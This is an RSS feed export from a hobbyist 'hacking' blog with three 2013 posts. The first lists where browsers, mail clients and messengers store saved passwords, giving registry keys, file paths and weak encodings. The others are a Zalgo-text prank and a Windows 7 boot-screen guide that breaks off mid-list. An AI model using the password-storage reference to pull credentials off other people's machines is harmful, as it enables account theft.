<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>Bamba Hacker</title><description></description><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><pubDate>Fri, 8 Nov 2024 08:34:33 -0800</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">37</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://bambahacks.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:keywords>Hacking</itunes:keywords><itunes:summary>Bamba Hack the Hacker</itunes:summary><itunes:subtitle>Bamba Hack the Hacker</itunes:subtitle><itunes:category text="Education"><itunes:category text="Educational Technology"/></itunes:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>All Saved Password Location</title><link>http://bambahacks.blogspot.com/2013/12/all-saved-password-location.html</link><category>Windows Hack</category><author>noreply@blogger.com (yu)</author><pubDate>Sat, 7 Dec 2013 19:37:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-4308802474572707489</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1OKLNoIezSav-Bx9uJ5eTndBKpG5MCdvlZBRW8PlbNovn_MHoBwjbQIkKeSf7VeX4sRnWjzd52AfrWTDaxYqXunteI9Ji9lx1FxxrjaUmr4zEYcKPIOl4oMgQbpgz2lMvo7v4wzfgG5nC/s1600/321000-passwords.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1OKLNoIezSav-Bx9uJ5eTndBKpG5MCdvlZBRW8PlbNovn_MHoBwjbQIkKeSf7VeX4sRnWjzd52AfrWTDaxYqXunteI9Ji9lx1FxxrjaUmr4zEYcKPIOl4oMgQbpgz2lMvo7v4wzfgG5nC/s1600/321000-passwords.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;b&gt;&lt;i&gt;Google Chrome:&lt;/i&gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Chrome Passwords are stored in a SQLite file the sites name and sites
 username is in clear text but the password is seeded in a Triple DES 
algorithm. The file is called Web Data and is stored in the following 
location&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;XP&lt;/b&gt;&lt;/i&gt;&lt;/u&gt; &lt;/span&gt;– C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;Vista&lt;/i&gt;&lt;/u&gt;&lt;/b&gt; &lt;/span&gt;– C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Trillian:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently.&lt;br /&gt;
&lt;br /&gt;
Trillian Passwords are stored in .ini files the first character of 
the password is encrypted with XOR with the key 243 then the password is
 converted into hex. The file is based on what the password is for so if
 it was icq it would be icq.ini (for new versions I think they are all 
stored in a file called accounts.ini or something similar if you open it
 up with notepad you will see all the data + the encrypted password). 
The files are stored in the following location:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;XP&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; (old version) – C:\Program Files\Trillian\users\&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;XP&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; (new version) – C:\Documents and Settings\Username\Local 
Settings\Application Data\Trillian\user\global – I am not sure on exact 
but it is somewhere there.&lt;br /&gt;
&lt;br /&gt;
Vista (old version)- C:\Program Files\Trillian\users\&lt;br /&gt;
&lt;br /&gt;
Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;MSN /Windows Live Messenger:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[AccountName]&lt;br /&gt;
&lt;br /&gt;
Windows Live Messenger version 8.x/9.x: The passwords are stored in 
the Credentials file, with entry name begins with “WindowsLive:name=”. 
They a set of Win API functions (Credential API’s) to store its’ 
security data (Credentials). These functions store user information, 
such as names and passwords for the accounts (Windows Live ID 
credentials). Windows Live ID Credential records are controlled by the 
operating system for each user and for each session. They are attached 
to the “target name” and “type”. If you are familiar with SQL you can 
think of target name and type as the primary key. Table below lists most
 frequently used fields in Windows Live ID Credential records.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Paltalk:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

Paltalk Passwords are using the same password encryption algorithm. 
Paltalk passwords are stored in the registry. To encrypt the new 
password Paltalk looks at the serial number of the disk C:\ and performs
 a mix with the Nickname. The resulting string is then mixed again with 
the password and some other constants. The final string is then encoded 
and written to the registry.&lt;br /&gt;
&lt;br /&gt;
AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.&lt;br /&gt;
&lt;br /&gt;
The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Google Talk:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

Google Talk passwords are encoded/decoded using Crypto API. Encrypted
 Gmail passwords are stored by Google Talk in the registry under 
HKEY_CURRENT_USER\Software\Google\Google&lt;br /&gt;
Talk\Accounts\[Account Name]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;i&gt;
&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Firefox:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;

The passwords are stored in one of the following filenames: 
signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)&lt;br /&gt;
These password files are located inside the profile folder of 
Firefox, in [Windows Profile]\Application 
Data\Mozilla\Firefox\Profiles\[Profile Name]&lt;br /&gt;
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;Yahoo Messenger 6.x:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager&lt;br /&gt;
(”EOptions string” value)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Yahoo Messenger 7.5 or later:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.&lt;br /&gt;
The value stored in “ETS” value cannot be recovered back to the original password.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;AIM&lt;/i&gt;&lt;/u&gt;:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.&lt;br /&gt;
448-bit keyword is used to encrypt the password with Blowfish. The 
encrypted string is then encoded using base64. The passwords are stored 
in the Registry, under HKEY_CURRENT_USER\Software\America 
Online\AIM6\Passwords&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;Filezilla:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Internet Explorer 4.00 – 6.00:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.&lt;br /&gt;
The base key of the Protected Storage is located under the following key:&lt;br /&gt;
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.&lt;br /&gt;
&lt;br /&gt;
You can browse the above key in the Registry Editor (RegEdit), but 
you won’t be able to watch the passwords, because they are encrypted.&lt;br /&gt;
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;Internet Explorer 7.00 – 8.00:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

The new versions of Internet Explorer stores the passwords in 2 different locations.&lt;br /&gt;
AutoComplete passwords are stored in the Registry under 
HKEY_CURRENT_USER\Software\Microsoft\Internet 
Explorer\IntelliForms\Storage2.&lt;br /&gt;
&lt;br /&gt;
HTTP Authentication passwords are stored in the Credentials file 
under Documents and Settings\Application Data\Microsoft\Credentials , 
together with login passwords of LAN computers and other passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;Opera:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;Outlook Express (All Versions)&lt;/i&gt;&lt;/u&gt;:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the 
Protected Storage, like the passwords of old versions of Internet 
Explorer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;br /&gt;

&lt;i&gt;&lt;u&gt;&lt;b&gt;Outlook 98/2000:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the 
Protected Storage, like the passwords of old versions of Internet 
Explorer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Outlook 2002-2008:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;/span&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;

All new versions of Outlook store the passwords in the same Registry key of the account settings.&lt;br /&gt;
&lt;br /&gt;
The accounts are stored in the Registry under 
HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging 
Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]&lt;br /&gt;
&lt;br /&gt;
If you use Outlook to connect an account on Exchange server, the 
password is stored in the Credentials file, together with login 
passwords of LAN computers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;ThunderBird:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]&lt;br /&gt;
You should search a filename with .s extension.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;Digsby:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat&lt;br /&gt;
All other passwords are stored in Digsby servers.&lt;br /&gt;
&lt;br /&gt;
&lt;h1 class="title" style="text-align: left;"&gt;
&amp;nbsp;
&lt;span style="color: #ea9999;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1OKLNoIezSav-Bx9uJ5eTndBKpG5MCdvlZBRW8PlbNovn_MHoBwjbQIkKeSf7VeX4sRnWjzd52AfrWTDaxYqXunteI9Ji9lx1FxxrjaUmr4zEYcKPIOl4oMgQbpgz2lMvo7v4wzfgG5nC/s72-c/321000-passwords.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Prank Your Facebook Friends Using Zalgo Text Generator Tool</title><link>http://bambahacks.blogspot.com/2013/12/prank-your-facebook-friends-using-zalgo.html</link><category>FB Hack</category><author>noreply@blogger.com (yu)</author><pubDate>Sun, 1 Dec 2013 21:26:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-4092679353659970392</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h1 class="entry-title"&gt;
Prank Your Facebook Friends Using Zalgo Text Generator Tool&lt;/h1&gt;
&amp;nbsp; How will&amp;nbsp;you feel when you see something scary on Facebook statuses? 
or something that looks like if is a bug on Facebook?&amp;nbsp;Well, here i gonna
 share something exactly matching that same thing that will prank your 
Facebook friend by posting something scary/grungy text effect called 
zalgo text. I will provide you a link of zalgo text generator below that
 will allow you to generate amazing scary text that you can easily post 
on Facebook status even you can directly paste into Facebook chat&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg85hsX6J6fl9Pm4j08b5yZ4SgZiykk2g3EgyS8ShOiTiS5xiHHO6EXtGJbE-6i9kdaySjUp6n5bPKekNan9xDj4oq0Yg2udC3F1pgqvoUdwrHdyoV5iFLWeQucvs9A_h8QIf35wXacEof1/s1600/http___makeagif.com__media_12-01-2013_Inkbcu.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg85hsX6J6fl9Pm4j08b5yZ4SgZiykk2g3EgyS8ShOiTiS5xiHHO6EXtGJbE-6i9kdaySjUp6n5bPKekNan9xDj4oq0Yg2udC3F1pgqvoUdwrHdyoV5iFLWeQucvs9A_h8QIf35wXacEof1/s320/http___makeagif.com__media_12-01-2013_Inkbcu.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;

&lt;br /&gt;
&lt;ins style="background-color: transparent; border: none; display: inline-table; height: 15px; margin: 0; padding: 0; position: relative; visibility: visible; width: 728px;"&gt;&lt;ins id="aswift_0_anchor" style="background-color: transparent; border: none; display: block; height: 15px; margin: 0; padding: 0; position: relative; visibility: visible; width: 728px;"&gt;&lt;/ins&gt;&lt;/ins&gt;&lt;br /&gt;
&lt;br /&gt;
if you wanna see live demo about how exactly this working and looks like then you have a look at this&lt;a href="https://www.facebook.com/prophethaxor/posts/486520494797351" target="_blank" title="Making Different On Facebook"&gt;prophet hacker ‘s facebook fan page post&lt;/a&gt;.
 So, if you like this amazing effect and want to post it on Facebook to 
prank your friends then below are full steps for getting this effect.&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: blue;"&gt;&lt;span style="font-size: large;"&gt;Step 1 &lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;Go to &lt;a href="http://fsymbols.com/generators/zalgo/" target="_blank"&gt;Zalgo Text Generator&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: blue;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;span style="font-size: large;"&gt;Step 2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;There you will see text generator tool like below :&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRJ3ultYMne-XbEpf_Fs3nPsxwUGS5DhQamRoKs4wKjoW3GsSDNgPm9fph26PdsKsGjd-iiFeDS3va8rZ9RXBtPnTmbjJQTT-j4svgqs9wUa76OF6pHCx1J-0mR7D8VHRV_9S3Z1MarUIQ/s1600/FGFHK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRJ3ultYMne-XbEpf_Fs3nPsxwUGS5DhQamRoKs4wKjoW3GsSDNgPm9fph26PdsKsGjd-iiFeDS3va8rZ9RXBtPnTmbjJQTT-j4svgqs9wUa76OF6pHCx1J-0mR7D8VHRV_9S3Z1MarUIQ/s640/FGFHK.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: blue;"&gt;&lt;span style="font-size: large;"&gt;Step 3 &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;Now, just write something that you like on first box and your new scary 
zalgo text will be generated in the other box right on it’s side. &lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: blue;"&gt;&lt;span style="font-size: large;"&gt;Step 4 &lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&amp;nbsp;Also you have some more option that you can configure in order to 
make your text effect more outstanding and look more scary, so check 
those too.&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: blue;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;Step 5 &lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
now you have to copy the text and then you can easily paste and 
post on your facebook timeline as statues update or into your facebook 
chat.&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg85hsX6J6fl9Pm4j08b5yZ4SgZiykk2g3EgyS8ShOiTiS5xiHHO6EXtGJbE-6i9kdaySjUp6n5bPKekNan9xDj4oq0Yg2udC3F1pgqvoUdwrHdyoV5iFLWeQucvs9A_h8QIf35wXacEof1/s72-c/http___makeagif.com__media_12-01-2013_Inkbcu.gif" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Change Windows 7 Boot Screen Animation</title><link>http://bambahacks.blogspot.com/2013/11/how-to-change-windows-7-boot-screen.html</link><category>Windows Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 26 Nov 2013 03:10:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-6349463327147621757</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Hey friends are you tired from watching your old window boot screen animation . Now , I&amp;nbsp; tell&lt;br /&gt;
you can you give your window a Funky cool new window boot screen animation . It is very simple&lt;br /&gt;
to add some animation ,We use a software called &lt;a href="http://www.coderforlife.com/projects/win7boot/" target="_blank"&gt;Windows 7 Boot Updater.&amp;nbsp; &lt;/a&gt;&amp;nbsp;&amp;nbsp; This software makes it possible to change boot animation,as well as text background.&lt;br /&gt;
&lt;br /&gt;
The application works by modifying the BOOTMGR system file. Since the 
application is in beta version and modifies certain critical system 
files it is always recommended to backup before using it. Though in our 
testing we found that the application worked well on a Windows 7 x64 SP1
 system without any problems&lt;br /&gt;
&lt;br /&gt;
Steps to change boot animation:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Step 1:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Download&amp;nbsp; &lt;a href="http://www.coderforlife.com/projects/win7boot/" target="_blank"&gt;Windows 7 Boot Updater&lt;/a&gt;&amp;nbsp; and open it.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Step 2:&lt;/span&gt;&lt;br /&gt;
Run the application and load boot screen file (.bs7).&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkGJ7mKUHUUem_hcHANCausIt1DglFdrSbyU9QuL1lioTkTuTz9swGoBZCR1ejGe4DollUuhPJhD6rVy0ZFYFq2UF5sssHQO4NeIOPWBuZIrC81P1QeCdXWdShVUZfwrIHdfr9E6kEzIkc/s1600/Win7BootUpdater.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkGJ7mKUHUUem_hcHANCausIt1DglFdrSbyU9QuL1lioTkTuTz9swGoBZCR1ejGe4DollUuhPJhD6rVy0ZFYFq2UF5sssHQO4NeIOPWBuZIrC81P1QeCdXWdShVUZfwrIHdfr9E6kEzIkc/s320/Win7BootUpdater.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: red;"&gt;Step 3:&lt;/span&gt;&lt;br /&gt;
Check that you have loaded correct boot screen using using play. Click ‘Apply’ to to change the boot screen.&lt;br /&gt;
&lt;div class="breadcrumbs"&gt;
&lt;div id="breadcrumbs"&gt;
&lt;span class="breadcrumb_last"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
Selected boot screens for Windows 7&lt;/h2&gt;
There are many skin in internet but few are best.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #6fa8dc;"&gt;&lt;br /&gt;&lt;span style="color: black;"&gt;1.Radian boot screen&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_TuXIH_JZJJLMdx_Sre2fe1TXbk_hm7jYIyfcUkQqqwgAwuXkJwd9l6XFZSQoPNyac4bUUpGhuCmpMZt6xSPr9jSo48uAEY0viCLuJcKtGMTLKVj-kep2F1uQiL7aGPeKugSHYaxctySm/s1600/radian_boot_screen_by_ghoster76-d45j642.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_TuXIH_JZJJLMdx_Sre2fe1TXbk_hm7jYIyfcUkQqqwgAwuXkJwd9l6XFZSQoPNyac4bUUpGhuCmpMZt6xSPr9jSo48uAEY0viCLuJcKtGMTLKVj-kep2F1uQiL7aGPeKugSHYaxctySm/s1600/radian_boot_screen_by_ghoster76-d45j642.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&lt;a href="http://fc09.deviantart.net/fs70/f/2011/217/9/8/radian_boot_screen_by_ghoster76-d45j642.7z" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.Window Progress counter &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI9vnPVa74tMzqzhWsp83MT9sCxMiefPd6X5z_j_9HhB-ooMErZDEAbjM_vIBGgNpDtUul7_ZgOzjvS3hTqDYqsXxFRbum0Jxm5iWFsa7aOFuWUnAHSo_R9JENBwiEhhaHYk7jxt4PXDw/s1600/7-progress-counter.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI9vnPVa74tMzqzhWsp83MT9sCxMiefPd6X5z_j_9HhB-ooMErZDEAbjM_vIBGgNpDtUul7_ZgOzjvS3hTqDYqsXxFRbum0Jxm5iWFsa7aOFuWUnAHSo_R9JENBwiEhhaHYk7jxt4PXDw/s1600/7-progress-counter.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://db.tt/vTFF2AQB" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
3.Need for Speed&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
